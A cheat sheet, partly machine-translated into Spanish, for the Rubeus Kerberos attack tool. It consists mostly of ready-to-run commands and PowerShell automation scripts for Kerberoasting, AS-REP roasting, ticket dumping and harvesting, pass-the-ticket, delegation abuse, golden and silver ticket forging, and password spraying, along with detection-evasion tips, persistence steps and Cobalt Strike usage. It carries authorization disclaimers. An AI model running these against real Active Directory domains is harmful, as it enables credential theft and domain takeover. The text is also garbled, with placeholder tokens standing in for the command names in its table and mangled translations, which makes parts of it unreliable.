Rubeus Kerberos Interaction Tool Cheat Sheet¶
__HTML_TAG_56_ Todos los comandos
Overview¶
Rubeus es una herramienta C# para la interacción y los abusos de Kerberos crudos. Está diseñado para atacar implementaciones Kerberos e incluye funcionalidad para solicitudes de tickets, renovaciones y varios ataques basados en Kerberos. Rubeus es particularmente útil para pruebas de penetración Active Directory y operaciones de equipo rojo.
▪ restablecimiento Advertencia: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y evaluaciones de seguridad. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación¶
Precompilado binario¶
# Download from GitHub releases
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v2.2.3/Rubeus.exe" -OutFile "Rubeus.exe"
# Verify download
Get-FileHash Rubeus.exe -Algorithm SHA256
Compile from Source¶
# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"
# Output will be in Rubeus/bin/Release/
Métodos de descarga alternativos¶
# Using PowerShell
$url = "https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output
# Using curl (if available)
curl -L -o Rubeus.exe https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe
Uso básico¶
Command Structure¶
# Basic syntax
Rubeus.exe [command] [options]
# Get help
Rubeus.exe help
# Get help for specific command
Rubeus.exe [command] /help
Available Commands¶
| Command | Description |
|---|---|
| INLINE_CODE_39 | Request a TGT (Ticket Granting Ticket) |
| INLINE_CODE_40 | Request a TGS (Ticket Granting Service) |
| INLINE_CODE_41 | Request a ticket for a specific service |
| INLINE_CODE_42 | Renew a ticket |
| INLINE_CODE_43 | Perform S4U (Service for User) attacks |
| INLINE_CODE_44 | Pass-the-ticket attacks |
| INLINE_CODE_45 | Purge tickets from memory |
| INLINE_CODE_46 | Describe ticket contents |
| INLINE_CODE_47 | List current tickets |
| INLINE_CODE_48 | Dump tickets from memory |
| INLINE_CODE_49 | Triage tickets |
| INLINE_CODE_50 | Monitor for new tickets |
| INLINE_CODE_51 | Harvest tickets |
| INLINE_CODE_52 | Brute force passwords |
| INLINE_CODE_53 | Kerberoasting attacks |
| INLINE_CODE_54 | AS-REP roasting attacks |
| _ | |
| ## Ticket Solicitudes y Gestión |
Request TGT (Ticket Granting Ticket)¶
# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com
# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com
# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com
# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com
Request TGS (Ticket Granting Service)¶
# Request TGS for specific service
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com
# Request TGS with current user context
Rubeus.exe asktgs /service:cifs/server.domain.com
# Request TGS for multiple services
Rubeus.exe asktgs /service:cifs/server.domain.com,http/server.domain.com
# Request TGS with specific encryption
Rubeus.exe asktgs /service:cifs/server.domain.com /enctype:aes256
Ticket Management¶
# List current tickets
Rubeus.exe klist
# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket
# Purge all tickets
Rubeus.exe purge
# Purge specific ticket
Rubeus.exe purge /luid:0x12345
# Dump tickets from memory
Rubeus.exe dump
# Dump tickets for specific user
Rubeus.exe dump /user:username
Kerberoasting Attacks¶
Basic Kerberoasting¶
# Kerberoast all SPNs
Rubeus.exe kerberoast
# Kerberoast specific user
Rubeus.exe kerberoast /user:serviceaccount
# Kerberoast with specific encryption
Rubeus.exe kerberoast /enctype:rc4
# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
Advanced Kerberoasting¶
# Kerberoast with LDAP filter
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"
# Kerberoast specific domain
Rubeus.exe kerberoast /domain:target.domain.com
# Kerberoast with specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com
# Kerberoast with enterprise principals
Rubeus.exe kerberoast /enterprise
Targeted Kerberoasting¶
# Kerberoast specific SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433
# Kerberoast multiple SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433,HTTP/web01.domain.com
# Kerberoast with password policy bypass
Rubeus.exe kerberoast /pwdsetafter:01/01/2020
# Kerberoast high-value targets
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"
AS-REP Roasting Attacks¶
Basic AS-REP Roasting¶
# AS-REP roast all users
Rubeus.exe asreproast
# AS-REP roast specific user
Rubeus.exe asreproast /user:username
# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt
# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat
Advanced AS-REP Roasting¶
# AS-REP roast with LDAP filter
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
# AS-REP roast specific domain
Rubeus.exe asreproast /domain:target.domain.com
# AS-REP roast with domain controller
Rubeus.exe asreproast /dc:dc01.domain.com
# AS-REP roast with credentials
Rubeus.exe asreproast /user:username /password:password /domain:domain.com
Pass-the-Ticket (PTT) Attacks¶
Pase Básico-el-Ticket¶
# Pass-the-ticket with base64 ticket
Rubeus.exe ptt /ticket:base64ticket
# Pass-the-ticket from file
Rubeus.exe ptt /ticket:ticket.kirbi
# Pass-the-ticket to specific LUID
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345
# Pass-the-ticket and create process
Rubeus.exe ptt /ticket:base64ticket /createnetonly:C:\Windows\System32\cmd.exe
Advanced PTT Técnicas¶
# Pass multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi,ticket2.kirbi
# Pass-the-ticket with service validation
Rubeus.exe ptt /ticket:base64ticket /service:cifs/server.domain.com
# Pass-the-ticket and inject into process
Rubeus.exe ptt /ticket:base64ticket /process:explorer.exe
S4U (Servicio para el Usuario) Ataques¶
S4U2 Self Ataques¶
# S4U2Self attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
# S4U2Self with AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
# S4U2Self with ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
S4U2Proxy Attacks¶
# S4U2Proxy attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
# S4U2Proxy with multiple services
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap
# S4U2Proxy with existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
Constrained Delegation Abuse¶
# Abuse constrained delegation
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com
# Abuse with protocol transition
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt
# Abuse with multiple hops
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:cifs/server2.domain.com
Golden and Silver Ticket Attacks¶
Golden Ticket Creation¶
# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...
# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520
Silver Ticket Creation¶
# Create silver ticket
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com
# Create silver ticket with AES
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com
# Create silver ticket for specific service
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com
Ticket Harvesting and Monitoring¶
Ticket Harvesting¶
# Harvest tickets from all sessions
Rubeus.exe harvest
# Harvest tickets with monitoring
Rubeus.exe harvest /interval:30
# Harvest tickets for specific user
Rubeus.exe harvest /user:administrator
# Harvest and save to file
Rubeus.exe harvest /outfile:harvested_tickets.txt
Ticket Monitoring¶
# Monitor for new tickets
Rubeus.exe monitor
# Monitor with specific interval
Rubeus.exe monitor /interval:60
# Monitor for specific users
Rubeus.exe monitor /filteruser:administrator,serviceaccount
# Monitor and save to file
Rubeus.exe monitor /outfile:monitored_tickets.txt
Ticket Triage¶
# Triage all tickets
Rubeus.exe triage
# Triage tickets for specific user
Rubeus.exe triage /user:administrator
# Triage with LUID filter
Rubeus.exe triage /luid:0x12345
# Triage and show service tickets only
Rubeus.exe triage /service
Password Attacks¶
Password Spray¶
# Password spray with single password
Rubeus.exe brute /password:Password123 /noticket
# Password spray with password list
Rubeus.exe brute /passwords:passwords.txt /noticket
# Password spray specific users
Rubeus.exe brute /users:users.txt /password:Password123 /noticket
# Password spray with domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket
Credential Validation¶
# Validate credentials
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /getcredentials
# Validate with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /getcredentials
# Validate with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /getcredentials
Advanced Techniques¶
Cross-Domain Ataques¶
# Request inter-realm TGT
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com
# Request cross-domain TGS
Rubeus.exe asktgs /service:krbtgt/parent.domain.com /domain:child.domain.com /ticket:base64ticket
# Golden ticket for child domain
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
Unconstrained Delegation Abuse¶
# Monitor for delegation tickets
Rubeus.exe monitor /targetuser:DC01$ /interval:5
# Extract TGT from delegation
Rubeus.exe dump /service:krbtgt /nowrap
# Use extracted TGT
Rubeus.exe ptt /ticket:extractedtgt
Resource-Based Constrained Delegation¶
# Abuse RBCD
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt
# RBCD with computer account
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt
Evasion Techniques¶
OPSEC Consideraciones¶
# Use specific encryption types
Rubeus.exe kerberoast /enctype:aes256
# Avoid detection with delays
Rubeus.exe kerberoast /delay:5000
# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.domain.com
# Limit requests
Rubeus.exe kerberoast /spn:specific/service.domain.com
Stealth Operations¶
# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0
# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host
# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024
Integración con otras herramientas¶
Mimikatz Integration¶
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi
# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi
Impacket Integration¶
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com
Cobalt Strike Integration¶
# Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast
beacon> execute-assembly Rubeus.exe asreproast
beacon> execute-assembly Rubeus.exe dump
Automation Scripts¶
Global Kerberos Assessment¶
# Comprehensive Kerberos assessment script
param(
[string]$Domain = $env:USERDOMAIN,
[string]$OutputPath = "C:\Temp\KerberosAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"
# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain
# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain
# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"
# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"
Write-Host "[+] Assessment complete. Results saved to $OutputPath"
Automated Ticket Harvesting¶
# Automated ticket harvesting script
param(
[int]$Interval = 300, # 5 minutes
[string]$OutputPath = "C:\Temp\TicketHarvest",
[int]$Duration = 3600 # 1 hour
)
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1
Write-Host "[+] Starting ticket harvesting for $Duration seconds"
while ((Get-Date) -lt $endTime) \\\\{
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$outputFile = "$OutputPath\harvest_$iteration`_$timestamp.txt"
Write-Host "[+] Iteration $iteration - Harvesting tickets..."
& Rubeus.exe harvest|Out-File $outputFile
Write-Host "[+] Tickets saved to $outputFile"
if ((Get-Date) -lt $endTime) \\{
Write-Host "[+] Waiting $Interval seconds..."
Start-Sleep -Seconds $Interval
\\}
$iteration++
\\}
Write-Host "[+] Ticket harvesting complete"
Domain Reconnaissance Script¶
# Domain reconnaissance with Rubeus
param(
[string]$Domain,
[string]$Username,
[string]$Password,
[string]$OutputPath = "C:\Temp\DomainRecon"
)
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Starting domain reconnaissance for $Domain"
# Test credentials
Write-Host "[+] Testing credentials..."
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /getcredentials
$credTest|Out-File "$OutputPath\credential_test.txt"
if ($credTest -match "TGT request successful") \\{
Write-Host "[+] Credentials valid, continuing reconnaissance..."
# Kerberoasting with credentials
Write-Host "[+] Kerberoasting with credentials..."
& Rubeus.exe kerberoast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"
# AS-REP Roasting with credentials
Write-Host "[+] AS-REP Roasting with credentials..."
& Rubeus.exe asreproast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"
Write-Host "[+] Reconnaissance complete"
\\} else \\{
Write-Host "[-] Credentials invalid, stopping reconnaissance"
\\}
Troubleshooting¶
Common Issues¶
# Clock skew issues
w32tm /resync
# Network connectivity
nslookup domain.com
telnet dc01.domain.com 88
# Kerberos configuration
klist purge
klist
# DNS resolution
nslookup _kerberos._tcp.domain.com
Debug Mode¶
# Enable Kerberos logging
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1
# View Kerberos events
Get-WinEvent -LogName System|Where-Object \\{$_.Id -eq 4768 -or $_.Id -eq 4769\\}
# Check ticket cache
klist tickets
Resolución de error
# KDC_ERR_PREAUTH_FAILED
# Check username/password, account lockout
# KDC_ERR_C_PRINCIPAL_UNKNOWN
# Verify username format and domain
# KDC_ERR_S_PRINCIPAL_UNKNOWN
# Check SPN existence and format
# KRB_AP_ERR_SKEW
# Synchronize time with domain controller
Buenas prácticas¶
Operational Security¶
- Use cuentas legítimas: Evite cuentas de servicio sospechosas cuando sea posible
- ** Solicitudes de envío**: No inunda el controlador de dominio con solicitudes
- ** Sincronización del tiempo**: Asegurar la sincronización del tiempo adecuado para evitar el corte del reloj
- Clean up: Eliminar entradas inyectadas después de las operaciones
- Monitor logs: Tener en cuenta los eventos de seguridad generados
Attack Strategy¶
# Start with reconnaissance
Rubeus.exe triage
Rubeus.exe klist
# Identify targets
Rubeus.exe kerberoast /stats
Rubeus.exe asreproast /stats
# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin
# Maintain persistence
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com
Resources¶
[Rubeus GitHub Repository](URL_61__ - Documentación del Protocolo de Kerberos_
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Rubeus. Siempre asegúrese de tener una autorización adecuada antes de realizar evaluaciones de seguridad Active Directory. *